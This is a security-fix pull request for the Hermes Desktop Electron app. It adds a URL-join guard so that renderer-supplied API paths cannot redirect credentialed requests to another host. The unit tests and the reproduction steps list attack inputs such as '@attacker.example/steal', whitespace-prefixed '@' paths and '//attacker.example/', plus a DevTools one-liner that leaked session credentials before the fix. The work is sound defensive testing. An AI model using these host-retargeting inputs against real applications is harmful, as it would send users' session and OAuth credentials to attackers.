### PR TITLE
fix(apps): stop Desktop API proxy from leaking session credentials via @-paths

### DIFF
--- a/apps/desktop/electron/backend-api-url.test.ts
+++ b/apps/desktop/electron/backend-api-url.test.ts
@@ -1,0 +1,45 @@
+import assert from 'node:assert/strict'
+
+import { test } from 'vitest'
+
+import { joinBackendApiUrl } from './backend-api-url'
+
+const LOCAL = 'http://127.0.0.1:7890'
+const REMOTE = 'https://gateway.example.com'
+
+test('joinBackendApiUrl keeps local API paths on the loopback origin', () => {
+  assert.equal(joinBackendApiUrl(LOCAL, '/api/status'), `${LOCAL}/api/status`)
+  assert.equal(
+    joinBackendApiUrl(LOCAL, '/api/sessions?limit=50&offset=0'),
+    `${LOCAL}/api/sessions?limit=50&offset=0`
+  )
+})
+
+test('joinBackendApiUrl keeps remote gateway paths on the configured origin', () => {
+  assert.equal(joinBackendApiUrl(REMOTE, '/api/sessions'), `${REMOTE}/api/sessions`)
+  assert.equal(
+    joinBackendApiUrl(`${REMOTE}/`, '/api/model/info?profile=iris'),
+    `${REMOTE}/api/model/info?profile=iris`
+  )
+})
+
+test('joinBackendApiUrl allows path segments that look like userinfo but stay on-origin', () => {
+  assert.equal(joinBackendApiUrl(LOCAL, '/@literal'), `${LOCAL}/@literal`)
+})
+
+test('joinBackendApiUrl rejects @-authority retargeting that would leak credentials', () => {
+  assert.throws(() => joinBackendApiUrl(LOCAL, '@attacker.example/'), /relative path/)
+  assert.throws(() => joinBackendApiUrl(REMOTE, '@attacker.example/steal'), /relative path/)
+})
+
+test('joinBackendApiUrl rejects protocol-relative and empty paths', () => {
+  assert.throws(() => joinBackendApiUrl(LOCAL, '//attacker.example/'), /relative path/)
+  assert.throws(() => joinBackendApiUrl(LOCAL, ''), /non-empty/)
+  assert.throws(() => joinBackendApiUrl(LOCAL, null), /non-empty/)
+  assert.throws(() => joinBackendApiUrl(LOCAL, undefined), /non-empty/)
+})
+
+test('joinBackendApiUrl rejects absolute URLs smuggled as the path', () => {
+  assert.throws(() => joinBackendApiUrl(LOCAL, 'http://attacker.example/'), /relative path/)
+  assert.throws(() => joinBackendApiUrl(LOCAL, 'https://attacker.example/'), /relative path/)
+})

--- a/apps/desktop/electron/backend-api-url.test.ts
+++ b/apps/desktop/electron/backend-api-url.test.ts
@@ -32,7 +32,14 @@ test('joinBackendApiUrl rejects @-authority retargeting that would leak credenti
   assert.throws(() => joinBackendApiUrl(REMOTE, '@attacker.example/steal'), /relative path/)
 })
 
-test('joinBackendApiUrl rejects protocol-relative and empty paths', () => {
+test('joinBackendApiUrl rejects whitespace-prefixed @-authority retargeting', () => {
+  assert.throws(() => joinBackendApiUrl(LOCAL, ' @attacker.example/'), /relative path/)
+  assert.throws(() => joinBackendApiUrl(LOCAL, '\t@attacker.example/'), /relative path/)
+})
+
+test('joinBackendApiUrl rejects protocol-relative-shaped and empty paths', () => {
+  // Shape reject: WHATWG concat after host:port keeps //evil on-origin, but
+  // renderer paths must still be single-slash relative API paths.
   assert.throws(() => joinBackendApiUrl(LOCAL, '//attacker.example/'), /relative path/)
   assert.throws(() => joinBackendApiUrl(LOCAL, ''), /non-empty/)
   assert.throws(() => joinBackendApiUrl(LOCAL, null), /non-empty/)

--- a/apps/desktop/electron/backend-api-url.ts
+++ b/apps/desktop/electron/backend-api-url.ts
@@ -1,0 +1,49 @@
+/**
+ * Join a Hermes backend base URL with a renderer-supplied API path.
+ *
+ * `hermes:api` concatenates `connection.baseUrl + path`. A path that does not
+ * start with `/` (notably `@host/...`) is parsed as URL userinfo and retargets
+ * the request to an attacker-controlled host while fetchJson still attaches
+ * session / OAuth credentials. Reject those paths before any network I/O.
+ */
+
+export function joinBackendApiUrl(baseUrl: string, path: unknown): string {
+  if (typeof path !== 'string' || path.length === 0) {
+    throw new Error('Hermes API path must be a non-empty string.')
+  }
+
+  // Single leading slash only: `@evil/` and `//evil/` must not retarget the host.
+  if (!path.startsWith('/') || path.startsWith('//')) {
+    throw new Error('Hermes API path must be a relative path starting with a single "/".')
+  }
+
+  const baseRaw = String(baseUrl || '').replace(/\/+$/, '')
+
+  if (!baseRaw) {
+    throw new Error('Hermes backend base URL is required.')
+  }
+
+  let base: URL
+  let joined: URL
+
+  try {
+    base = new URL(baseRaw)
+    joined = new URL(`${baseRaw}${path}`)
+  } catch (error: any) {
+    throw new Error(`Invalid Hermes backend API URL: ${error?.message || error}`)
+  }
+
+  if (joined.protocol !== 'http:' && joined.protocol !== 'https:') {
+    throw new Error(`Unsupported Hermes backend URL protocol: ${joined.protocol}`)
+  }
+
+  if (joined.origin !== base.origin) {
+    throw new Error('Hermes API path must not change the backend origin.')
+  }
+
+  if (joined.username || joined.password) {
+    throw new Error('Hermes API URL must not include userinfo.')
+  }
+
+  return `${baseRaw}${path}`
+}

--- a/apps/desktop/electron/backend-api-url.ts
+++ b/apps/desktop/electron/backend-api-url.ts
@@ -1,10 +1,11 @@
 /**
  * Join a Hermes backend base URL with a renderer-supplied API path.
  *
- * `hermes:api` concatenates `connection.baseUrl + path`. A path that does not
- * start with `/` (notably `@host/...`) is parsed as URL userinfo and retargets
- * the request to an attacker-controlled host while fetchJson still attaches
- * session / OAuth credentials. Reject those paths before any network I/O.
+ * Callers previously did `connection.baseUrl + path`. A path that does not
+ * start with `/` (notably `@host/...`, including whitespace-prefixed forms)
+ * is parsed as URL userinfo and retargets the request to an attacker-controlled
+ * host while fetchJson still attaches session / OAuth credentials. Reject those
+ * paths before any network I/O.
  */
 
 export function joinBackendApiUrl(baseUrl: string, path: unknown): string {

--- a/apps/desktop/electron/main.ts
+++ b/apps/desktop/electron/main.ts
@@ -32,6 +32,7 @@ import {
 import nodePty from 'node-pty'
 
 import { classifyActiveRuntime } from './active-runtime-state'
+import { joinBackendApiUrl } from './backend-api-url'
 import { stopBackendChild as stopBackendChildImpl } from './backend-child'
 import { dashboardFallbackArgs, sourceDeclaresServe } from './backend-command'
 import { createBackendConnectionState } from './backend-connection-state'
@@ -7561,7 +7562,7 @@ async function fetchJsonForProfile(profile, path) {
 // Issue an arbitrary method against a profile's resolved backend, parsed JSON.
 async function requestJsonForProfile(profile: string, path: string, method: string, body?: string) {
   const conn = await ensureBackend(profile)
-  const url = `${conn.baseUrl}${path}`
+  const url = joinBackendApiUrl(conn.baseUrl, path)
   const opts = { method, body, timeoutMs: DEFAULT_FETCH_TIMEOUT_MS }
 
   if (conn.authMode === 'oauth') {
@@ -10108,7 +10109,9 @@ ipcMain.handle('hermes:api', async (_event, request) => {
 
   const requestPath = pathWithGlobalRemoteProfile(request.path, profile, profileRouteOptions(profile))
 
-  const url = `${connection.baseUrl}${requestPath}`
+  // Fail closed before fetchJson attaches session / OAuth credentials: a path
+  // like `@evil/` would otherwise retarget the request off connection.baseUrl.
+  const url = joinBackendApiUrl(connection.baseUrl, requestPath)
 
   // OAuth gateways authenticate REST via EITHER a native bearer token
   // (cookieless RFC 8252 flow) OR the HttpOnly session cookie held in the OAuth


### PR DESCRIPTION
## What does this PR do?

Stops Hermes Desktop's `hermes:api` proxy from following renderer-supplied paths that retarget the backend host (for example `@attacker.example/`) while still attaching session or OAuth credentials. Valid local and remote gateway bases keep working; only paths that leave the trusted connection origin are rejected.

### Bug Cause

`hermes:api` built URLs as `connection.baseUrl + request.path`. Local backends use a pathless base like `http://127.0.0.1:PORT`. A path starting with `@host/...` (including whitespace-prefixed forms) is parsed as URL userinfo, so the request host becomes attacker-controlled. `fetchJson` still attaches `X-Hermes-Session-Token` or OAuth bearer/cookie credentials. OAuth remotes are especially exposed because those credentials live in the main process, not the renderer.

### Reproduction Steps

1. Open Hermes Desktop with a live backend connection.
2. Open DevTools in a chat window (F12).
3. Run: `await window.hermesDesktop.api({ path: '@attacker.example/', method: 'GET' })`

Expected: main rejects the path; no credentialed request leaves the trusted `connection.baseUrl` origin.
Before fix: main HTTP-requests `attacker.example` with live session / OAuth credentials attached.

### Fix

Add pure `joinBackendApiUrl` that requires a single-slash relative path and the same origin as the trusted base, then use it in `hermes:api` and `requestJsonForProfile` before any credentialed fetch. Unit tests cover local/remote happy paths and `@` / whitespace-`@` / `//` / absolute-URL rejects.

## Related Issue

Fixes #74649

## Type of Change

- [x] Security fix

## Changes Made

- `apps/desktop/electron/backend-api-url.ts` - add `joinBackendApiUrl` path/origin guard
- `apps/desktop/electron/backend-api-url.test.ts` - behavior contracts for local/remote join and retarget rejects
- `apps/desktop/electron/main.ts` - route `hermes:api` and `requestJsonForProfile` through the guard

## How to Test

1. Manual: in Desktop DevTools, `await window.hermesDesktop.api({ path: '@attacker.example/', method: 'GET' })` should throw; normal `/api/...` calls should still succeed against local and remote gateways.
2. Automated (already run locally, 93 passed):

```bash
cd apps/desktop
npm test -- electron/backend-api-url.test.ts electron/connection-config.test.ts electron/profile-delete-routing.test.ts
```

## Checklist

### Code

- [x] I've read the [Contributing Guide](https://github.com/NousResearch/hermes-agent/blob/main/CONTRIBUTING.md)
- [x] My commit messages follow [Conventional Commits](https://www.conventionalcommits.org/) (`fix(scope):`, `feat(scope):`, etc.)
- [x] I searched for [existing PRs](https://github.com/NousResearch/hermes-agent/pulls) to make sure this isn't a duplicate
- [x] My PR contains **only** changes related to this fix/feature (no unrelated commits)
- [x] I've run relevant desktop vitest suites and all tests pass
- [x] I've added tests for my changes (required for bug fixes, strongly encouraged for features)
- [x] I've tested on my platform: Windows 11

### Documentation & Housekeeping

- [x] I've updated relevant documentation (README, `docs/`, docstrings) - or N/A
- [x] I've updated `cli-config.yaml.example` if I added/changed config keys - or N/A
- [x] I've updated `CONTRIBUTING.md` or `AGENTS.md` if I changed architecture or workflows - or N/A
- [x] I've considered cross-platform impact (Windows, macOS) per the [compatibility guide](https://github.com/NousResearch/hermes-agent/blob/main/CONTRIBUTING.md#cross-platform-compatibility) - or N/A
- [x] I've updated tool descriptions/schemas if I changed tool behavior - or N/A

## Screenshots / Logs

N/A
